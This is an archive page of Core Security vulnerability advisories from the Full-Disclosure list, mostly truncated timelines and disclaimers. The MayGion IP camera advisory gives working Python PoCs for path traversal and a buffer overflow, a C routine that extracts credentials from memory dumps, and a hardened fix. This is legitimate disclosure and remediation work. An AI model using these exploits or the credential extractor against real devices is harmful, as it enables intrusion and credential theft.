[Full-disclosure] CORE-2013-0430 - Buffer overflow in Ubiquiti airCam RTSP service

2013-06-11 Thread CORE Security Technologies Advisories
  0x41414141
0x40a7eac0: 0x41414141  0x41414141  0x41414141  0x41414141
0x40a7ead0: 0x41414141  0x41414141  0x41414141  0x41414141
0x40a7eae0: 0x41414141  0x41414141  0x41414141  0x12345678
0x40a7eaf0: 0x76696c2f  0x68632f65  0x305f3030  0x000d7100
0x40a7eb00: 0x000c6060  0x000c6119  0x00059340  0x000491a8
0x40a7eb10: 0x000d73f6  0x000c6267  0x0001  0x000c6060
0x40a7eb20: 0x000c6119  0x00059340  0x000c6118  0x00049780
0x40a7eb30: 0x  0x000c611c
-/


9. *Report Timeline*

. 2013-05-02:
Core Security Technologies notifies the Ubiquiti team of the
vulnerability. Publication date is set for May 29th, 2013.

. 2013-05-02:
Vendor acknowledges the receipt of the email and asks for technical
details.

. 2013-05-02:
A draft report with technical details and a PoC sent to Ubiquiti team.

. 2013-05-03:
Vendor notifies that a new firmware version should address this
vulnerability. It will be released shortly to the alpha and beta community.

. 2013-05-06:
Core notifies that the advisory will be re-scheduled to be released when
patches are available to the alpha and beta community and asks for a
tentative release date.

. 2013-05-09:
Core asks for a status update regarding this vulnerability and a
tentative release date.

. 2013-05-13:
Vendor notifies the firmware is still in internal testing and the
release date will be confirmed in the following days.

. 2013-05-27:
Core notifies that there was no answer in the last 2 weeks regarding the
release date. Core also notifies that the advisory was re-scheduled for
Jun 4th, and asks for a clear timeline to justify further delaying the
release.

. 2013-05-28:
Vendor notifies that the new firmware is almost done and a confirmed
date will be notified in the following days.

. 2013-05-29:
Core asks if a beta firmware is available for downloading.

. 2013-05-29:
Vendor notifies that they have a v1.1.6 build of the firmware which is
being tested internally and will be released very soon, probably this
week. However, it is not yet available on the ubnt.com/download site.

. 2013-05-29:
First release date missed.

. 2013-06-03:
Core asks for a status update.

. 2013-06-03:
Vendor notifies that they do not have a specific release date yet.

. 2013-06-11:
Vendor notifies that they released firmware 1.2.0 along with airVision 2
[2][3], and a public announcement will be made soon. Release of firmware
1.1.6 (for the airVision 1.x platform) has to be defined.

. 2013-06-11:
Advisory CORE-2013-0430 published.


10. *References*

[1] http://www.ubnt.com.
[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.
[3] Ubiquiti firmware v1.2.0
http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2013-0517 - Xpient Cash Drawer Operation Vulnerability

2013-06-05 Thread CORE Security Technologies Advisories
rity Bulletins and patches are available to active users
of Xpient software. Vendor requires that the Proof of Concept (PoC)
and technical details be removed from Core's report.

. 2013-06-04:
Core notifies that the advisory is re-scheduled for Jun 5th and will
include the PoC since it gives the users a tool to assess the risks they
are running and the effectiveness of possible countermeasures and
workarounds.

. 2013-06-05:
Advisory CORE-2013-0517 is published.


10. *References*

[1] http://www.xpient.com




13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/



[Full-disclosure] [CORE-2013-0103] Mac OSX Server DirectoryService buffer overflow

2013-06-04 Thread CORE Security Technologies Advisories
 of Jun 6th.

. 2013-05-31:
Vendor notifies that the security update is on track for releasing next
week and assigns CVE-2013-0984 for this issue. Vendor changes the
vulnerability impact from DoS to code-execution.

. 2013-06-04:
Vendor notifies that the security update was released.

. 2013-06-04:
Advisory CORE-2013-0103 released.


9. *References*

[1]
http://opensource.apple.com/source/DirectoryService/DirectoryService-621/Proxy/DSTCPEndpoint.cpp
[2] https://www.dlitz.net/software/pycrypto/
[3] http://support.apple.com/kb/HT5501 - DirectoryService
[4] https://appleseed.apple.com




12. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/



[Full-disclosure] CORE-2013-0318 - TP-Link IP Cameras Multiple Vulnerabilities

2013-05-28 Thread CORE Security Technologies Advisories
ttp://www.boa.org/.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


[Full-disclosure] CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities

2013-05-28 Thread CORE Security Technologies Advisories
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

MayGion IP Cameras multiple vulnerabilities

1. *Advisory Information*

Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Advisory URL:
http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605

3. *Vulnerability Description*

Multiple vulnerabilities have been found in MayGion IP cameras [1] based
on firmware v09.27 and below, which could allow an unauthenticated remote
attacker:

   1. [CVE-2013-1604] to dump the camera's memory and retrieve user
credentials,
   2. [CVE-2013-1605] to execute arbitrary code.

4. *Vulnerable Packages*

   . MayGion IP cameras based on firmware 2011.27.09.
   . Other firmware versions are probably affected too but they were not
checked.

5. *Non-Vulnerable Packages*

   . H.264 ipcam firmware 2013.04.22.

6. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and
Francisco Falcon from Core Exploit Writers Team.

7. *Technical Description / Proof of Concept Code*

7.1. *User Credentials Leaked via Path Traversal*

[CVE-2013-1604] The following Python code exploits a path traversal and
dumps the camera's memory: the HTTP server does not normalise the request
path, so the "../" sequences escape the web root and /proc/kcore is served
like any other file. Valid user credentials can be extracted from this
memory dump by an unauthenticated remote attacker.

/-
import http.client   # Python 3; the original PoC used the Python 2 httplib module

# http.client sends the request target verbatim, so the "../" segments reach
# the camera's HTTP server unnormalised and walk out of the web root.
# /proc/kcore is the kernel's view of physical memory; the response is as
# large as the device's RAM and is read whole here, as in the original PoC.
conn = http.client.HTTPConnection("192.168.100.1")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()   # raw memory image, to be searched offline for credentials
conn.close()
-/
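The advisory says credentials can be recovered from the dump but not how they appear in memory. As an added example (not code from the advisory or from MayGion's firmware), the C program below scans a memory image for HTTP Basic authentication headers left behind in the web server's request buffers and decodes the user:password pairs. It assumes the camera authenticates its web UI with Basic auth, which is the usual scheme on embedded devices of this kind; the SAMPLE_DUMP bytes are constructed for the example, and the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define CRED_MAX 64   /* longest "user:password" we bother to recover */

/* Base64 alphabet: 0..63 for a valid symbol, -1 for '=' and everything else. */
static int b64val(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decodes Base64 from src[0..srclen) up to the first byte outside the alphabet
 * (the '=' pad, CR/LF, or binary junk around a fragment in a memory dump).
 * Writes a NUL-terminated result to dst and returns its length, or -1 if dst
 * is too small or a lone trailing sextet shows the text was not Base64. */
int b64_decode(const unsigned char *src, size_t srclen, char *dst, size_t dstlen)
{
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;
    for (size_t i = 0; i < srclen; i++) {
        int v = b64val(src[i]);
        if (v < 0)
            break;
        acc = (acc << 6) | (unsigned int)v;   /* high bits may wrap; only the low ones are used */
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n + 1 >= dstlen)
                return -1;
            dst[n++] = (char)((acc >> bits) & 0xff);
        }
    }
    if (bits == 6)
        return -1;
    dst[n] = '\0';
    return (int)n;
}

/* Scans a raw dump (which contains NUL bytes, so lengths are explicit) for
 * "Authorization: Basic <base64>" and decodes each hit into out[i].  Only
 * decodes containing the "user:password" separator are kept, so a stray
 * marker followed by garbage is dropped.  Returns the number recovered. */
int extract_basic_creds(const unsigned char *dump, size_t len,
                        char out[][CRED_MAX], int max)
{
    static const char marker[] = "Authorization: Basic ";
    const size_t mlen = sizeof marker - 1;
    int found = 0;
    for (size_t i = 0; i + mlen <= len && found < max; i++) {
        if (memcmp(dump + i, marker, mlen) != 0)
            continue;
        size_t start = i + mlen;
        int n = b64_decode(dump + start, len - start, out[found], CRED_MAX);
        if (n > 0 && memchr(out[found], ':', (size_t)n) != NULL)
            found++;
        i = start - 1;    /* resume scanning just past the marker */
    }
    return found;
}

/* Constructed sample dump (not real camera memory): two HTTP request buffers
 * surrounded by binary junk, plus a decoy marker followed by non-Base64 bytes. */
static const unsigned char SAMPLE_DUMP[] =
    "\x7f" "ELF\x00\x00\x00\x01"
    "GET /cgi-bin/stream HTTP/1.1\r\nHost: 192.168.100.1\r\n"
    "Authorization: Basic YWRtaW46c2VjcmV0\r\n\r\n"
    "\x00\x00\x90\x90\x90" "Authorization: Basic " "\x00\xff\xfe\x00"
    "POST /setup.cgi HTTP/1.1\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\n\r\n"
    "\x00\x00\x00";

int main(void)
{
    char creds[8][CRED_MAX];
    int n = extract_basic_creds(SAMPLE_DUMP, sizeof SAMPLE_DUMP - 1, creds, 8);
    for (int i = 0; i < n; i++)
        printf("credential %d: %s\n", i + 1, creds[i]);
    return 0;
}
```

Against a real /proc/kcore image the same loop is run over the file read in chunks that overlap by the marker length; other credential-bearing artefacts (form posts carrying user and password fields, a cached /etc/passwd page) are found the same way with a different marker.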

7.2. *Buffer overflow*

[CVE-2013-1605] The following Python script triggers the vulnerability
without authentication. The oversized request path overruns a fixed-size
buffer in the camera's HTTP server, and the instruction pointer (program
counter) ends up overwritten with the filler bytes, 0x41414141 for the "A"
pattern used here, which is the classic signature of a buffer overrun.

/-
import http.client   # Python 3; the original PoC used the Python 2 httplib module

# 3000 bytes of "A" (0x41) in the request path are far more than the server's
# path buffer holds; the overflow crashes the server with the program counter
# set to 0x41414141.
conn = http.client.HTTPConnection("192.168.100.1")
conn.request("GET", "/" + "A" * 3000 + ".html")
resp = conn.getresponse()   # raises once the server dies without answering
data = resp.read()
conn.close()
-/
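Both findings in 7.1 and 7.2 come down to the camera's HTTP server trusting the request path: it is appended to the document root without a length bound (CWE-119) and without resolving ".." (CWE-22). The C code below is an added illustration of that vulnerable shape next to a hardened replacement; it is not MayGion's code, and WEBROOT, URL_MAX_LEN and the function names are hypothetical. The hardened routine refuses the 3000-byte request from 7.2 before anything is copied and refuses the /proc/kcore request from 7.1 the moment a ".." would climb above the root.

```c
#include <stdio.h>
#include <string.h>

#define WEBROOT      "/var/www"   /* hypothetical document root */
#define URL_MAX_LEN  256          /* hypothetical fixed-size request buffer */

/* The vulnerable shape behind both findings (for contrast only; never call it
 * with attacker-controlled input): no length check, no ".." handling. */
void build_path_vulnerable(char out[URL_MAX_LEN], const char *url)
{
    strcpy(out, WEBROOT);         /* CWE-119: out is URL_MAX_LEN bytes, url is unbounded */
    strcat(out, url);             /* CWE-22: "/../../proc/kcore" is appended verbatim */
}

/* Hardened version: maps a request target onto a file below WEBROOT.
 * Returns 0 and writes the path to out on success, -1 on any rejection. */
int build_path_safe(char *out, size_t outlen, const char *url)
{
    /* Bound the input before anything touches a fixed buffer (CWE-119 fix). */
    if (url == NULL || url[0] != '/' || strlen(url) >= URL_MAX_LEN)
        return -1;

    /* Lexical normalisation: walk the segments, dropping "." and popping on
     * "..".  A ".." that would climb above the root is refused outright
     * instead of being clamped to "/", so a traversal attempt fails loudly
     * (CWE-22 fix). */
    const char *seg[URL_MAX_LEN / 2];     /* a segment needs >= 2 bytes of URL */
    size_t      seglen[URL_MAX_LEN / 2];
    int depth = 0;
    const char *p = url;
    while (*p) {
        while (*p == '/')
            p++;                  /* collapse repeated slashes */
        if (!*p)
            break;
        const char *start = p;
        while (*p && *p != '/')
            p++;
        size_t len = (size_t)(p - start);
        if (len == 1 && start[0] == '.')
            continue;
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return -1;        /* escape above WEBROOT */
            depth--;
            continue;
        }
        seg[depth] = start;
        seglen[depth] = len;
        depth++;
    }

    /* Rebuild WEBROOT/seg1/seg2/... with an explicit bound on every write. */
    size_t used = strlen(WEBROOT);
    if (used + 2 > outlen)        /* room for at least "/" and the NUL */
        return -1;
    memcpy(out, WEBROOT, used);
    if (depth == 0)
        out[used++] = '/';        /* "/" itself maps to the root directory */
    for (int i = 0; i < depth; i++) {
        if (used + 1 + seglen[i] + 1 > outlen)
            return -1;
        out[used++] = '/';
        memcpy(out + used, seg[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return 0;
}

int main(void)
{
    char path[URL_MAX_LEN];
    const char *tests[] = {
        "/index.html",
        "/../../../../../../../../../proc/kcore",   /* the CVE-2013-1604 request */
        "/cgi/../img/./logo.png",
    };
    for (size_t i = 0; i < sizeof tests / sizeof tests[0]; i++)
        printf("%-42s -> %s\n", tests[i],
               build_path_safe(path, sizeof path, tests[i]) == 0 ? path : "REJECTED");
    return 0;
}
```

build_path_safe works lexically, so it has to run after percent-decoding (otherwise "%2e%2e" slips past the ".." test), and a server should still pass the result through realpath() and check that the canonical path starts with the web root, because a symlink below the root can point outside it.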

8. *Report Timeline*

. 2013-05-02:
Core Security Technologies notifies MayGion of the vulnerabilities.
Publication date is set for May 29th, 2013.

. 2013-05-02:
Vendor asks for a report with technical information.

. 2013-05-03:
A draft advisory containing technical details sent to MayGion team.

. 2013-05-03:
Vendor notifies that all vulnerabilities were fixed in the last firmware
version, released April 22nd, 2013.

. 2013-05-09:
Core asks for a list of affected devices and firmware. No reply received.

. 2013-05-28:
Advisory CORE-2013-0322 is published.

9. *References*

[1] http://www.maygion.com


12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


[Full-disclosure] CORE-2013-0302 - Zavio IP Cameras multiple vulnerabilities

2013-05-28 Thread CORE Security Technologies Advisories
;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off
-/

9. *Report Timeline*
. 2013-03-19:
Core Security Technologies contacts Zavio Tech Support and asks for a
security contact to whom a draft report regarding these vulnerabilities
can be sent. No reply received.

. 2013-05-02:
Core again asks Zavio Tech Support for a security contact to whom a
confidential report can be sent.

. 2013-05-09:
Core asks for a reply.

. 2013-05-14:
Core asks for a reply.

. 2013-05-21:
Core tries to contact vendor for last time without any reply.

. 2013-05-28:
After 5 failed attempts to report the issues, the advisory
CORE-2013-0302 is published as 'user-release'.

10. *References*

[1] http://www.zavio.com/product.php?id=25.
[2] http://zavio.com/product.php?id=23.
[3] http://www.boa.org/.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


[Full-disclosure] CORE-2013-0303 - D-Link IP Cameras Multiple Vulnerabilities

2013-04-29 Thread CORE Security Technologies Advisories

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


[Full-disclosure] CORE-2013-0301 - Vivotek IP Cameras Multiple Vulnerabilities

2013-04-29 Thread CORE Security Technologies Advisories

13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


[Full-disclosure] CORE-2012-1128 - SAP Netweaver Message Server Multiple Vulnerabilities

2013-02-15 Thread CORE Security Technologies Advisories
 "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)

print "[*] Crash sent !"

-/



9. *Report Timeline*
. 2012-12-10:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for January 22nd,
2013.

. 2012-12-10:
Core sends an advisory draft with technical details and a PoC.

. 2012-12-11:
The SAP team confirms the reception of the issue.

. 2012-12-21:
SAP notifies that they concluded the analysis of the reported issues and
confirms two out of the five vulnerabilities. Vendor also notifies that
the other three reported issues were already fixed in February, 2012.
Vendor also notifies that the necessary code changes are being done and
extensive tests will follow. The corresponding security note and patches
are planned to be released on the Security Patch Day in Feb 12th 2013.

. 2012-12-21:
Core re-schedules the advisory publication for Feb 12th, 2013.

. 2012-12-28:
SAP notifies Core that they will be contacted if tests fail, in order to
re-schedule the advisory publication.

. 2013-01-22:
First release date missed.

. 2013-01-28:
SAP notifies that they are still confident with releasing a security
note and patches on Feb 12th as planned.

. 2013-01-29:
Core acknowledges receiving the information and notifies that everything
is ready for public disclosure on Feb 12th. Core also asks for additional
information regarding the patched vulnerabilities mentioned in
[2012-12-21], including links to the security bulletin, CVEs, and patches,
in order to verify whether those patches effectively fix the reported flaws.

. 2013-02-01:
SAP notifies that the patched vulnerabilities mentioned in [2012-12-21]
were reported in [5] and no CVEs were assigned to them. Those
vulnerabilities seem to be related to ZDI advisories [6], [7], [8].

. 2013-02-06:
Core notifies that the patched vulnerabilities will be removed from the
advisory and asks for additional information regarding the affected and
patched version numbers.

. 2013-02-01:
SAP notifies that security note 1800603 will be released and that the
note will provide further information regarding this vulnerability.

. 2013-02-13:
Advisory CORE-2012-1128 published.


10. *References*

[1] http://www.sap.com/platform/netweaver/index.epx.
[2] SAP Security note Feb 2013
https://service.sap.com/sap/support/notes/1800603.
[3]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e1000a421937/content.htm.

[4]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e1000a42189d/frameset.htm.

[5] SAP Security notes Feb 2012
https://service.sap.com/sap/support/notes/1649840.
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/.
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/.
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.




13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/



[Full-disclosure] CORE-2011-1123 - Windows Kernel ReadLayoutFile Heap Overflow

2012-07-17 Thread CORE Security Technologies Advisories
indings stating the two issues are separate,
even though they share a same code area.

. 2012-03-09:
Core asks if the March publication date still stands.

. 2012-03-12:
MSRC notifies that, due to some late findings about app-compat concerns,
they will need more time to issue the patch. MSRC asks to re-schedule
the advisory publication to May 8th.

. 2012-03-09:
Core re-schedules the advisory publication to May 8th.

. 2012-04-01:
Pedro Varangot leaves the Core Advisories Team. Thanks Peter and good
luck with your new challenges.

. 2012-04-02:
Core asks for additional information regarding the actual vulnerable
Windows' versions and specific workarounds for this vulnerability.

. 2012-04-03:
MSRC notifies that the actually vulnerable systems are Windows XP/2003
(elevation of privilege) and Windows Vista/2008 (denial of service).
MSRC also notifies that no workaround has been identified for this
vulnerability.

. 2012-05-08:
The advisory CORE-2011-1123 is published.

. 2012-05-08:
MSRC publishes the Security Bulletin MS12-034 [3] for addressing this
issue.

. 2012-05-11:
Core notifies MSRC that the vulnerability was not correctly patched in
[3] and re-sends a PoC to reproduce the issue.

. 2012-05-14:
Based on the blog post [5], MSRC asks for a PoC which triggers the issue
in a Vista/Windows 7 platform.

. 2012-05-14:
Core clarifies that this issue does not seem to be exploitable in Windows 7
(as noted in the blog post [5]), but it is still exploitable in
Windows Vista and 2008. Core also notifies that the exploit for this
vulnerability was sent to Core Impact clients on May 8th, 2012.

. 2012-05-16:
MSRC notifies that a new patch will be released and a new CVE number
will be assigned to it.

. 2012-05-17:
Core acknowledges the update and asks for its publication date.

. 2012-05-18:
MSRC asks for a conference call to discuss this issue and asks Core to
make no change on the advisory or the blog post until the publication day.

. 2012-05-18:
Core requests that all communication be kept via email in order to track
all interactions and involve everyone interested in it. Core also
notifies that the advisory update will be released after the new patch is
published.

. 2012-06-14:
Core asks MSRC for additional information regarding this issue.

. 2012-06-18:
MSRC notifies that they are targeting July as the publication timeframe
for this issue.

. 2012-06-21:
Core acknowledges the publication date and asks for the new CVE number
and any additional information that can be added in the advisory amendment.

. 2012-07-05:
MSRC informs Core that the new bulletin will be published on July 10th,
and that the new CVE number is CVE-2012-1890.

. 2012-07-10:
MSRC publishes the Security Bulletin Summary for July 2012 [6].

. 2012-07-11:
The advisory CORE-2011-1123 is updated.



9. *References*

[1] http://www.exploit-db.com/exploits/18140/
[2] http://msdn.microsoft.com/en-us/library/windows/desktop/ms646305(v=vs.85).aspx
[3] http://technet.microsoft.com/en-gb/security/bulletin/ms12-034
[4] http://technet.microsoft.com/en-gb/security/bulletin/ms12-047
[5] http://blog.coresecurity.com/2012/05/10/the-big-trick-behind-exploit-ms12-034/
[6] http://technet.microsoft.com/en-us/security/bulletin/ms12-jul


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. *PGP/GPG Keys*

This advisor

[Full-disclosure] CORE-2012-0530 - Lattice Diamond Programmer Buffer Overflow

2012-06-21 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2012-0123 - SAP Netweaver Dispatcher Multiple Vulnerabilities

2012-05-08 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass

2011-11-10 Thread CORE Security Technologies Advisories
hat the kSBXProfileNoNetwork sandbox profile should
guarantee that "all sockets-based networking is prohibited". The PoC
sent to Apple shows that through the use of Apple events (osascript is
used in the PoC just to keep it simple) an attacker could circumvent
the restriction. So, in the end, sockets-based networking is used.

. 2010-10-18:
Vendor responds that it is currently considering modifying its
documentation to explicitly point out what Core described; namely,
that the restrictions that these particular sandbox profiles provide
are limited to the process in which the sandbox is applied.

. 2011-11-10:
The advisory CORE-2011-0919 is published as a user release.


10. *References*

[1] App Sandbox Design Guide -- Designing for App Sandbox
http://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html

[2] Charlie Miller, "Hacking OS X", Black Hat Japan 2008
https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf




13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.17 (MingW32)

iEYEARECAAYFAk68OxMACgkQyNibggitWa0YWgCfYbGm9R0+YJw6CxP6TNwdhEWr
9ZMAn16nqBqNbO582D5QpejeuTEV5RAj
=HruN
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0825: Adobe Shockwave Player TextXtra.x32 vulnerability

2011-11-08 Thread CORE Security Technologies Advisories
 advisory CORE-2011-0825 is published.


10. *References*

[1] Security bulletin for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
[2] Upgrade Adobe Shockwave Player
http://get.adobe.com/shockwave/




13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.17 (MingW32)

iEYEARECAAYFAk65nI4ACgkQyNibggitWa3r4QCfTQBWDnGgU2zU5VIsav0W7rVi
ggwAoLEFRsdGblP/tEZKyAry8BDtw4Em
=EZuR
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0810 - E107 CMS Script Command Injection

2011-10-24 Thread Core Security Technologies Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/


e107 CMS Script Command Injection


1. *Advisory Information*

Title: e107 CMS Script Command Injection
Advisory ID: CORE-2011-0810
Advisory URL:
http://www.coresecurity.com/content/e107-cms-script-command-injection
Date published: 2011-10-24
Date of last update: 2011-10-24
Vendors contacted: e107
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1513

3. *Vulnerability Description*

When the install script for e107 CMS has not been removed, an attacker
can "reinstall" the application with arbitrary parameters. These
parameters are stored in the configuration file "e107_config.php". If
the attacker supplies a valid MySQL server value followed by a closing
